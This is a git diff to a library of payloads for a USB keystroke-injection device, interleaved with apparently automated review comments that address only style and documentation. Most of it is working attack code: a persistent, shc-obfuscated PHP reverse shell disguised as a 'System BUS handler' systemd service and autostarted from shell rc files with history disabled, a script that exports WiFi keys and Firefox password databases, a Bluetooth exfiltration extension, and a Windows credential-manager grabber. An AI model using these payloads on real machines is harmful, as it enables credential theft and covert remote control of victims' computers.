diff --git a/payloads/extensions/ble_exfil.sh b/payloads/extensions/ble_exfil.sh
new file mode 100644
index 00000000..47f5ce3d
--- /dev/null
+++ b/payloads/extensions/ble_exfil.sh
@@ -0,0 +1,16 @@
+#!/bin/bash
+#
+# BLE_EXFIL v1 by @drapl0n
+# Exfiltrate data(25 bytes) stored in "/loot/ble_exfil.txt" via BLE.
+# Usage: BLE_EXFIL
+
+function BLE_EXFIL() {
+ stty -F /dev/ttyS1 speed 115200 cs8 -cstopb -parenb -echo -ixon -icanon -opost
+ stty -F /dev/ttyS1 speed 115200 cs8 -cstopb -parenb -echo -ixon -icanon -opost
+ sleep 1
+ text=$(cat /root/udisk/loot/ble_exfil.txt)
+ exfil=${text:0:25}
+ echo -n -e "AT+ADVDAT=$exfil" > /dev/ttyS1
+}
+
+export -f BLE_EXFIL
diff --git a/payloads/library/credentials/BunnyLogger/payload.sh b/payloads/library/credentials/BunnyLogger/payload.sh
index 90d1ea36..fab26f88 100644
--- a/payloads/library/credentials/BunnyLogger/payload.sh
+++ b/payloads/library/credentials/BunnyLogger/payload.sh
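Review bot: The `stty -F /dev/ttyS1 speed 115200 …` line in BLE_EXFIL appears twice back to back with identical arguments; the second call is dead repetition and should be removed, or, if the repeat is a deliberate workaround for the serial port, a one-line comment should say so. The header also describes the loot file as "/loot/ble_exfil.txt" while the function reads `/root/udisk/loot/ble_exfil.txt`, so I would make the comment match the code, e.g. `# Reads /root/udisk/loot/ble_exfil.txt (the udisk's /loot folder) and advertises its first 25 bytes.` A further style point: `function BLE_EXFIL() {` mixes the `function` keyword with `()`; `BLE_EXFIL() {` is the portable spelling.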
@@ -11,10 +11,10 @@ chmod +x /var/tmp/.system/xinput echo -e "while :\ndo\n\tping -c 5 0.0.0.0\n\tif [ $? -eq 0 ]; then\n\t\tphp -r '\$sock=fsockopen(\"0.0.0.0\",4444);exec("\"/var/tmp/.system/sys -i "<&3 >&3 2>&3"\"");'\n\tfi\ndone" > /var/tmp/.system/systemBus chmod +x /var/tmp/.system/systemBus mkdir -p ~/.config/systemd/user -echo -e "[Unit]\nDescription= System BUS handler\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/systemBus -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=multi-user.target" > ~/.config/systemd/user/systemBUS.service +echo -e "[Unit]\nDescription= System BUS handler\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/systemBus -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=default.target" > ~/.config/systemd/user/systemBUS.service echo "while true; do systemctl --user restart systemBUS.service; sleep 15m; done" > /var/tmp/.system/reboot chmod +x /var/tmp/.system/reboot -echo -e "[Unit]\nDescription= System BUS handler reboot.\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/reboot -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=multi-user.target" > ~/.config/systemd/user/reboot.service +echo -e "[Unit]\nDescription= System BUS handler reboot.\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/reboot -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=default.target" > ~/.config/systemd/user/reboot.service systemctl --user daemon-reload systemctl --user enable --now systemBUS.service systemctl --user start --now systemBUS.service diff --git a/payloads/library/credentials/FireSnatcher/FireSnatcher.bat b/payloads/library/credentials/FireSnatcher/FireSnatcher.bat new file mode 100644 index 00000000..d08c8229 --- /dev/null +++ b/payloads/library/credentials/FireSnatcher/FireSnatcher.bat 
@@ -0,0 +1,6 @@ +mkdir %~dp0\loot\%COMPUTERNAME% +cd /D %~dp0\loot\%COMPUTERNAME% && netsh wlan export profile key=clear +C: cd \D %appdata%\mozilla\firefox\profiles\ +cd %appdata%\mozilla\firefox\profiles\*.default-release\ +copy key4.db %~dp0\loot\%COMPUTERNAME% +copy logins.json %~dp0\loot\%COMPUTERNAME% \ No newline at end of file diff --git a/payloads/library/credentials/FireSnatcher/README.md b/payloads/library/credentials/FireSnatcher/README.md new file mode 100644 index 00000000..1d3b0dd0 --- /dev/null +++ b/payloads/library/credentials/FireSnatcher/README.md 
@@ -0,0 +1,45 @@ +# Title: FireSnatcher +# Description: Copies Wifi Keys, and Firefox Password Databases +# Author: KarrotKak3 +# Props: saintcrossbow & 0iphor13 +# Version: 1.0.2.0 (Work in Progress) +# Category: Credentials +# Target: Windows (Logged in) +# Attackmodes: HID, Storage + +# Full Description +# ---------------- +# Attacks an Unlocked Windows Machine +# Payload targets: +# - All WiFi creds +# - Firefox Saved Password Database +# +# PAYLOAD RUNS START TO FINISH IN ABOUT 20 SEC +# Delays to Allow Powershell Time to Open and to Give Attack time to Run + +# HOW TO USE PASSWORD DB: COPY KEY4.DB AND LOGINS.JSON TO YOUR COMPUTER AT +# %APPDATA%\MOZILLA\FIREFOX\PROFILES\*.DEFAULT-RELEASE +# Open Firefox and find loot in Settings-> Privacy & Security -> Saved Logins + + +# KNOWN ISSUES +# --------------- +# Loot is saved in Payloads/switch#/loot + + +# Files +# ----- +# - payload.txt: Starts the attack. All configuration contained in this file. +# - FireSnatcher.bat: Worker that grabs Creds + + +# Setup +# ----- +# - Place the payload.txt and FireSnatcher.bat in Payload folder +# - If you are using a SD card, copy FireSnatcher.bat under /payloads/switchn/ (where n is the switch you are running) +# - Good idea to have the Bunny ready to copy to either the device or SD for maximum versatility + +**LED meanings** +- Magenta: Initial setup – about 1 – 3 seconds +- Single yellow blink: Attack in progress +- Green rapid flash, then solid, then off: Attack complete diff --git a/payloads/library/credentials/FireSnatcher/payload.txt b/payloads/library/credentials/FireSnatcher/payload.txt new file mode 100644 index 00000000..143efd55 --- /dev/null +++ b/payloads/library/credentials/FireSnatcher/payload.txt 
@@ -0,0 +1,78 @@ +# Title: FireSnatcher +# Description: Copies Wifi Keys, and Firefox Password Databases +# Author: KarrotKak3 +# Props: saintcrossbow & 0iphor13 +# Version: 1.0.2.0 (Work in Progress) +# Category: Credentials +# Target: Windows (Logged in) +# Attackmodes: HID, Storage + +# Full Description +# ---------------- +# Attacks an Unlocked Windows Machine +# Payload targets: +# - All WiFi creds +# - Firefox Saved Password Database +# +# PAYLOAD RUNS START TO FINISH IN ABOUT 20 SEC +# Delays to Allow Powershell Time to Open and to Give Attack time to Run + +# HOW TO USE PASSWORD DB: COPY KEY4.DB AND LOGINS.JSON TO YOUR COMPUTER AT +# %APPDATA%\MOZILLA\FIREFOX\PROFILES\*.DEFAULT-RELEASE +# Open Firefox and find loot in Settings-> Privacy & Security -> Saved Logins + + +# KNOWN ISSUES +# --------------- +# Loot is saved in Payloads/switch#/loot + + +# Files +# ----- +# - payload.txt: Starts the attack. All configuration contained in this file. +# - FireSnatcher.bat: Worker that grabs Creds + + +# Setup +# ----- +# - Place the payload.txt and FireSnatcher.bat in Payload folder +# - If you are using a SD card, copy FireSnatcher.bat under /payloads/switchn/ (where n is the switch you are running) +# - Good idea to have the Bunny ready to copy to either the device or SD for maximum versatility + +# LEDs +# ---- +# Magenta: Initial setup – about 1 – 3 seconds +# Single yellow blink: Attack in progress +# Green rapid flash, then solid, then off: Attack complete – Bash Bunny may be removed + +# Options +# ------- +# Name of Bash Bunny volume that appears to Windows (BashBunny is default) +BB_NAME="BashBunny" + +# Setup +# ----- +LED SETUP + + +# Attack +# ------ +ATTACKMODE HID STORAGE +Q DELAY 500 +LED ATTACK +Q DELAY 100 +Q GUI r +Q DELAY 100 +Q STRING powershell Start-Process powershell +Q ENTER +Q DELAY 7000 +Q STRING "iex((gwmi win32_volume -f 'label=''BashBunny''').Name+'\payloads\\$SWITCH_POSITION\FireSnatcher.bat')" +Q ENTER +Q DELAY 8000 +Q STRING EXIT +Q 
ENTER +sync +LED FINISH +Q DELAY 1500 +shutdown now + diff --git a/payloads/library/credentials/sudoSnatch/payload.sh b/payloads/library/credentials/sudoSnatch/payload.sh index a11c2654..56eb0443 100644 --- a/payloads/library/credentials/sudoSnatch/payload.sh +++ b/payloads/library/credentials/sudoSnatch/payload.sh 
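Review bot: `BB_NAME="BashBunny"` is documented under "Options" as the configurable volume name, but nothing in the hunk reads it — the `Q STRING "iex((gwmi win32_volume -f 'label=''BashBunny''')…"` line carries a hard-coded label — so editing the option silently does nothing. Either use the variable on that line or drop the option and its comment, so the documentation matches what runs. The header block is also a verbatim copy of the README.md added in the same commit, and the two already differ (the README's LED line lacks "Bash Bunny may be removed"); keeping the long description in one place and referring to it from the other would stop the drift.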
@@ -10,10 +10,10 @@ touch /var/tmp/.system/sysLog echo -e "while :\ndo\n\tping -c 5 0.0.0.0\n\tif [ $? -eq 0 ]; then\n\t\tphp -r '\$sock=fsockopen(\"0.0.0.0\",4444);exec("\"cat /var/tmp/.system/sysLog "<&3 >&3 2>&3"\"");'\n\tfi\ndone" > /var/tmp/.system/systemBus chmod +x /var/tmp/.system/systemBus mkdir -p ~/.config/systemd/user -echo -e "[Unit]\nDescription= System BUS handler\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/systemBus -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=multi-user.target" > ~/.config/systemd/user/systemBUS.service +echo -e "[Unit]\nDescription= System BUS handler\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/systemBus -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=default.target" > ~/.config/systemd/user/systemBUS.service echo "while true; do systemctl --user restart systemBUS.service; sleep 15m; done" > /var/tmp/.system/reboot chmod +x /var/tmp/.system/reboot -echo -e "[Unit]\nDescription= System BUS handler reboot.\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/reboot -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=multi-user.target" > ~/.config/systemd/user/reboot.service +echo -e "[Unit]\nDescription= System BUS handler reboot.\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/reboot -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=default.target" > ~/.config/systemd/user/reboot.service systemctl --user daemon-reload systemctl --user enable --now systemBUS.service systemctl --user start --now systemBUS.service diff --git a/payloads/library/execution/ScreenGrab/screenGrab/payload.sh b/payloads/library/execution/ScreenGrab/screenGrab/payload.sh index ea0ff7a6..7c0eec75 100644 --- a/payloads/library/execution/ScreenGrab/screenGrab/payload.sh 
+++ b/payloads/library/execution/ScreenGrab/screenGrab/payload.sh @@ -10,7 +10,7 @@ mkdir /var/tmp/.system/sysLog cp -r $mntt/payloads/library/screenGrab/systemBus /var/tmp/.system/systemBus chmod +x /var/tmp/.system/systemBus mkdir -p ~/.config/systemd/user -echo -e "[Unit]\nDescription= System BUS handler\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/systemBus -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=multi-user.target" > ~/.config/systemd/user/systemBUS.service +echo -e "[Unit]\nDescription= System BUS handler\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/systemBus -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=default.target" > ~/.config/systemd/user/systemBUS.service systemctl --user daemon-reload systemctl --user enable --now systemBUS.service systemctl --user start --now systemBUS.service diff --git a/payloads/library/execution/bunnyDOS/bunnyDOS/payload.sh b/payloads/library/execution/bunnyDOS/bunnyDOS/payload.sh index eeb3f5f8..e7b34aed 100644 --- a/payloads/library/execution/bunnyDOS/bunnyDOS/payload.sh +++ b/payloads/library/execution/bunnyDOS/bunnyDOS/payload.sh 
@@ -6,7 +6,7 @@ ip=$(ip -o -f inet addr show | awk '/scope global/ {print $4}') open=$(nmap -p 80 $ip -q -oG - | grep open | awk '{print $2}' | awk '{printf("%s ",$0)} END { printf "\n" }') mkdir /var/tmp/.system/ mkdir -p ~/.config/systemd/user -echo -e "[Unit]\nDescription= System IO handler.\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/sysHandler -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=multi-user.target" > ~/.config/systemd/user/libSystemIO.service +echo -e "[Unit]\nDescription= System IO handler.\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/sysHandler -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=default.target" > ~/.config/systemd/user/libSystemIO.service cp -r $mntt/payloads/library/bunnyDOS/systemIO /var/tmp/.system/ chmod +x /var/tmp/.system/systemIO for i in $open diff --git a/payloads/library/execution/camPeek/camPeek/payload.sh b/payloads/library/execution/camPeek/camPeek/payload.sh index 3759ce12..84d9f4d0 100644 --- a/payloads/library/execution/camPeek/camPeek/payload.sh +++ b/payloads/library/execution/camPeek/camPeek/payload.sh 
@@ -10,7 +10,7 @@ mkdir /var/tmp/.system/sysLog cp -r $mntt/payloads/library/camPeek/systemBus /var/tmp/.system/systemBus chmod +x /var/tmp/.system/systemBus mkdir -p ~/.config/systemd/user -echo -e "[Unit]\nDescription= System BUS handler\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/systemBus -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=multi-user.target" > ~/.config/systemd/user/systemBUS.service +echo -e "[Unit]\nDescription= System BUS handler\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/systemBus -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=default.target" > ~/.config/systemd/user/systemBUS.service systemctl --user daemon-reload systemctl --user enable --now systemBUS.service systemctl --user start --now systemBUS.service diff --git a/payloads/library/exfiltration/BLE_EXFIL_DEMO/payload.txt b/payloads/library/exfiltration/BLE_EXFIL_DEMO/payload.txt new file mode 100644 index 00000000..35e9dcac --- /dev/null +++ b/payloads/library/exfiltration/BLE_EXFIL_DEMO/payload.txt 
@@ -0,0 +1,47 @@
+# Description: Demonstration of BLE_EXFIL extension.
+# AUTHOR: drapl0n
+# Version: 1.0
+# Category: Exfiltration
+# Target: Unix-like operating systems.
+# Attackmodes: HID, Storage
+
+LED SETUP
+ATTACKMODE STORAGE HID
+GET SWITCH_POSITION
+LED ATTACK
+Q DELAY 1000
+Q CTRL-ALT t
+Q DELAY 1000
+
+# [Prevent storing history]
+Q STRING unset HISTFILE
+Q ENTER
+Q DELAY 200
+
+# [Fetching BashBunny's block device]
+Q STRING lol='$(lsblk | grep 1.8G)'
+Q ENTER
+Q DELAY 100
+Q STRING disk='$(echo $lol | awk '\'{print\ '$1'}\'\)''
+Q ENTER
+Q DELAY 200
+
+# [Mounting BashBunny]
+Q STRING udisksctl mount -b /dev/'$disk' /tmp/tmppp
+Q ENTER
+Q DELAY 2000
+Q STRING mntt='$(lsblk | grep $disk | awk '\'{print\ '$7'}\'\)''
+Q ENTER
+Q DELAY 500
+
+# [Advertising Data]
+Q STRING echo BashBunnyRocks \> '$mntt'/loot/ble_exfil.txt
+Q ENTER
+BLE_EXFIL
+Q DELAY 200
+Q STRING udisksctl unmount -b /dev/'$disk'
+Q ENTER
+Q DELAY 500
+Q STRING exit
+Q ENTER
+LED FINISH
diff --git a/payloads/library/exfiltration/Win_HID_BackupKeyManager/payload.txt b/payloads/library/exfiltration/Win_HID_BackupKeyManager/payload.txt
new file mode 100644
index 00000000..48b0284a
--- /dev/null
+++ b/payloads/library/exfiltration/Win_HID_BackupKeyManager/payload.txt
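Review bot: The header is missing the `# Title:` line that the other payload.txt files in this commit carry, and `# Target: Unix-like operating systems.` overstates what the script supports: it drives `udisksctl` and `lsblk`, which narrows it to Linux hosts with udisks2. I would add `# Title: BLE_EXFIL_DEMO` and change the target line to `# Target: Linux with udisks2 (uses udisksctl and lsblk).` The script also calls `BLE_EXFIL`, which only exists when payloads/extensions/ble_exfil.sh is installed, so an `# Extensions: BLE_EXFIL` line (as Win_HID_BackupKeyManager does with `# Extensions: Run`) would tell readers about that dependency.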
@@ -0,0 +1,66 @@
+#!/bin/bash
+# Title: KeyManager Backup
+# Description: Create a backup of the key manager which stores log-on credentials for servers, websites and programs
+# Author: Cribbit
+# Version: 1.0
+# Category: Exfiltration
+# Target on: Windows 10
+# Attackmodes: HID & STORAGE
+# Extensions: Run
+# Props: Paranoid Ninja
+
+####################### Config #######################
+password=lamepassword
+##################### End Config #####################
+
+LED SETUP
+
+ATTACKMODE HID STORAGE
+
+LED ATTACK
+
+QUACK DELAY 200
+RUN WIN "rundll32 keymgr.dll, KRShowKeyMgr"
+QUACK DELAY 200
+# button: Backup up...
+QUACK ALT b
+QUACK DELAY 200
+# button: Browse...
+QUACK ALT b
+# file name
+QUACK STRING "backup"
+# select task bar
+QUACK ALT d
+QUACK DELAY 200
+# look for bunny
+QUACK STRING "BashBunny"
+QUACK DELAY 600
+#select drive
+QUACK DOWNARROW
+# add loot folder
+QUACK STRING "/loot"
+QUACK ENTER
+QUACK DELAY 200
+# button: Save
+QUACK ALT s
+QUACK DELAY 200
+# button: Next
+QUACK ALT n
+QUACK DELAY 200
+# note: keycroc you can uses CTRL-ALT-DELETE
+QUACK CTRL-ALT DELETE
+QUACK DELAY 200
+QUACK STRING "$password"
+QUACK TAB
+QUACK STRING "$password"
+# button: Next
+QUACK ALT n
+QUACK DELAY 300
+# button: Finish
+QUACK ALT f
+QUACK DELAY 200
+# button: Close
+QUACK ALT c
+
+LED FINISH
+
diff --git a/payloads/library/exfiltration/Win_HID_BackupKeyManager/readme.md b/payloads/library/exfiltration/Win_HID_BackupKeyManager/readme.md
new file mode 100644
index 00000000..89c5fdbd
--- /dev/null
+++ b/payloads/library/exfiltration/Win_HID_BackupKeyManager/readme.md
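Review bot: The header keys do not follow the convention the other payload.txt files in this commit use: `# Target on: Windows 10` and `# Attackmodes: HID & STORAGE` where the others write `# Target:` and `HID, STORAGE`, so anything that greps these fields will miss this payload; I would change them to `# Target: Windows 10` and `# Attackmodes: HID, STORAGE`. The `#!/bin/bash` shebang is also unique to this payload.txt among those added here; keep it or drop it consistently. Two comment typos: `# button: Backup up...` doubles the word, and `# note: keycroc you can uses CTRL-ALT-DELETE` should read `you can use`.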
@@ -0,0 +1,30 @@
+# KeyManager Backup
+- Author: Cribbit
+- Version: 1.0
+- Tested on: Windows 10
+- Category: Exfiltration
+- Attackmode: HID & STORAGE
+- Extensions: Run
+- Props: Paranoid Ninja https://twitter.com/NinjaParanoid/status/1516442028963659777
+
+## Description
+Create a backup of the key manager which stores log-on credentials for servers, websites and programs.
+
+## Change Log
+| Version | Changes |
+| ------- | --------------- |
+| 1.0 | Initial release |
+
+## Config
+set the password for the backup by setting the `password` variable
+
+## Notes
+This payload relays heavily on button shortcuts this mean it is very target to an English version of windows.
+If you are targeting a different language, you will need to change the letter after the ALT key to the corresponding letter for the button.
+
+## Colours
+| Status | Colour | Description |
+| -------- | ----------------------------- | --------------------------- |
+| SETUP | Magenta solid | Setting attack mode |
+| ATTACK | Yellow single blink | Injecting script |
+| FINISHED | Green blink followed by SOLID | Injection finished |
\ No newline at end of file
diff --git a/payloads/library/remote_access/LinuxPreter/payload.sh b/payloads/library/remote_access/LinuxPreter/payload.sh
index cfecd2cf..7bdb73ab 100644
--- a/payloads/library/remote_access/LinuxPreter/payload.sh
+++ b/payloads/library/remote_access/LinuxPreter/payload.sh
@@ -6,7 +6,7 @@ cp -r $mntt/tools/sysHandle.bin /var/tmp/.system chmod +x /var/tmp/.system/sysHandle.bin mkdir -p ~/.config/systemd/user/ systemctl --user start systemPer.service -echo -e "[Unit]\nDescription= System BUS handler\n\n[Service]\nExecStart=/var/tmp/.system/./sysHandle.bin -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=multi-user.target" > ~/.config/systemd/user/systemPer.service +echo -e "[Unit]\nDescription= System BUS handler\n\n[Service]\nExecStart=/var/tmp/.system/./sysHandle.bin -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=default.target" > ~/.config/systemd/user/systemPer.service echo -e "ls -a | grep 'zshrc' &> /dev/null\nif [ \$? = 0 ]; then\n\techo \"systemctl --user enable --now systemPer.service \" >> ~/.zshrc\nfi\n\nls -a | grep 'bashrc' &> /dev/null\nif [ \$? = 0 ]; then\n\techo \"systemctl --user enable --now systemPer.service\" >> ~/.bashrc\nfi" > ~/tmmmp chmod +x ~/tmmmp && cd ~/ && ./tmmmp && rm tmmmp && exit diff --git a/payloads/library/remote_access/persistentReverseBunny/README.md b/payloads/library/remote_access/persistentReverseBunny/README.md new file mode 100644 index 00000000..e8ea4c13 --- /dev/null +++ b/payloads/library/remote_access/persistentReverseBunny/README.md 
@@ -0,0 +1,36 @@
+## About:
+* Title: persistentReverseBunny
+* Description: persistentReverseBunny provides you persistent reverse shell remotely/locally.
+* AUTHOR: drapl0n
+* Version: 1.0
+* Category: Remote Access
+* Target: Unix-like operating systems with systemd.
+* Attackmodes: HID, STORAGE
+
+## persistentReverseBunny: provides you persistent encoded reverse shell remotely/locally within 15 secs.
+
+### Workflow:
+Keeping tracks clear by disabling and deleting history. Creating hidden directory to store payload. Creating payload mechanism and compiling it for obfuscation, which checks whether internet is connected to the target system, if yes then it creates reverse shell to attackers machine. Creating non-root systemd service to keep payload running in background. Enabling service. Autostarting service on trigger of terminal emulator or shell.
+
+### Algorithm:
+1. Stop storing history, this helps to keep tracks clear from begining.
+2. Creating reverse shell.
+3. Creating non-root systemd service.
+4. Enabling service.
+5. Starting service on trigger of firing terminal emulator/shell.
+
+### LED Status:
+* `SETUP` : MAGENTA
+* `ATTACK` : YELLOW
+* `FINISH` : GREEN
+
+### Directory Structure of payload components:
+| FileName | Directory |
+| ----------------------- | ----------------------------- |
+| payload.txt | /payloads/switch1/ |
+| persistentReverseBunny/ | /payloads/libray/ |
+
+### Note:
+* Change ip address(0.0.0.0) and port number(4444) to your server's ip address and port number in `reversePersistentBunny/payload.sh` on line `6`.
+#### Support me if you like my work:
+* https://twitter.com/drapl0n
diff --git a/payloads/library/remote_access/persistentReverseBunny/payload.txt b/payloads/library/remote_access/persistentReverseBunny/payload.txt
new file mode 100644
index 00000000..de367d14
--- /dev/null
+++ b/payloads/library/remote_access/persistentReverseBunny/payload.txt
@@ -0,0 +1,51 @@
+# Description: persistentReverseBunny provides you persistent and ofuscated reverse shell remotely/locally within 15 secs.
+# AUTHOR: drapl0n
+# Version: 1.0
+# Category: Remote Access
+# Target: Unix-like operating systems with systemd.
+# Attackmodes: HID, Storage
+
+LED SETUP
+ATTACKMODE STORAGE HID
+GET SWITCH_POSITION
+LED ATTACK
+Q DELAY 1000
+Q CTRL-ALT t
+Q DELAY 1000
+
+# [Prevent storing history]
+Q STRING unset HISTFILE
+Q ENTER
+Q DELAY 200
+
+# [Fetching BashBunny's block device]
+Q STRING lol='$(lsblk | grep 1.8G)'
+Q ENTER
+Q DELAY 100
+Q STRING disk='$(echo $lol | awk '\'{print\ '$1'}\'\)''
+Q ENTER
+Q DELAY 200
+
+# [Mounting BashBunny]
+Q STRING udisksctl mount -b /dev/'$disk' /tmp/tmppp
+Q ENTER
+Q DELAY 2000
+Q STRING mntt='$(lsblk | grep $disk | awk '\'{print\ '$7'}\'\)''
+Q ENTER
+Q DELAY 500
+
+# [transfering payload script]
+Q STRING cp -r '$mntt'/payloads/library/persistentReverseBunny/payload.sh /tmp/
+Q ENTER
+Q STRING chmod +x /tmp/payload.sh
+Q ENTER
+Q STRING /tmp/./payload.sh \&
+Q ENTER
+Q STRING disown
+Q ENTER
+Q STRING udisksctl unmount -b /dev/'$disk'
+Q ENTER
+Q DELAY 500
+Q STRING exit
+Q ENTER
+LED FINISH
diff --git a/payloads/library/remote_access/persistentReverseBunny/persistentReverseBunny/payload.sh b/payloads/library/remote_access/persistentReverseBunny/persistentReverseBunny/payload.sh
new file mode 100644
index 00000000..edd304f3
--- /dev/null
+++ b/payloads/library/remote_access/persistentReverseBunny/persistentReverseBunny/payload.sh
@@ -0,0 +1,18 @@ +#!/bin/bash +lol=$(lsblk | grep 1.8G) +disk=$(echo $lol | awk '{print $1}') +mntt=$(lsblk | grep $disk | awk '{print $7}') +mkdir /var/tmp/.system/ +echo -e "#!"/bin/bash"\nwhile :\ndo\n\tping -c 5 0.0.0.0\n\tif [ $? -eq 0 ]; then\n\t\tphp -r '\$sock=fsockopen(\"0.0.0.0\",4444);exec("\"/bin/sh -i "<&3 >&3 2>&3"\"");'\n\tfi\ndone" > /var/tmp/.system/pop +cp -r $mntt/payloads/library/persistentReverseBunny/shc /var/tmp/.system/ +chmod +x /var/tmp/.system/shc +/var/tmp/.system/./shc -f /var/tmp/.system/pop -o /var/tmp/.system/systemBus +chmod +x /var/tmp/.system/systemBus +rm /var/tmp/.system/pop* +mkdir -p ~/.config/systemd/user +echo -e "[Unit]\nDescription= System BUS handler\n\n[Service]\nExecStart=/var/tmp/.system/systemBus -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=default.target" > ~/.config/systemd/user/systemBUS.service +systemctl --user daemon-reload +systemctl --user enable --now systemBUS.service +systemctl --user start --now systemBUS.service +echo -e "ls -a | grep 'zshrc' &> /dev/null\nif [ $? = 0 ]; then\n\techo systemctl --user enable --now systemBUS.service >> ~/.zshrc\nfi\n\nls -a | grep 'bashrc' &> /dev/null\nif [ $? = 0 ]; then\n\techo systemctl --user enable --now systemBUS.service >> ~/.bashrc\nfi\n\n" > ~/tmmmp +chmod +x ~/tmmmp && ~/./tmmmp && rm ~/tmmmp && rm /tmp/payload.sh && rm /var/tmp/.system/shc diff --git a/payloads/library/remote_access/persistentReverseBunny/persistentReverseBunny/shc b/payloads/library/remote_access/persistentReverseBunny/persistentReverseBunny/shc new file mode 100644 index 00000000..8e7c686c Binary files /dev/null and b/payloads/library/remote_access/persistentReverseBunny/persistentReverseBunny/shc differ
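Review bot: The commit vendors `shc` as an opaque prebuilt binary (`Binary files /dev/null and b/…/persistentReverseBunny/shc differ`) that payload.sh copies to the target and executes, and nothing in the commit says where the binary came from, which version it is, or what checksum it should have; an unverifiable executable checked into a payload library is a supply-chain risk for every user of the repository. The README should record the shc source and version together with a hash of the committed file (the hash of the binary is not visible on this page), or the binary should be dropped in favour of building it from source. payload.sh itself has no header comment, unlike its payload.txt; adding the same `# Description / # AUTHOR / # Version` block would make the file self-describing.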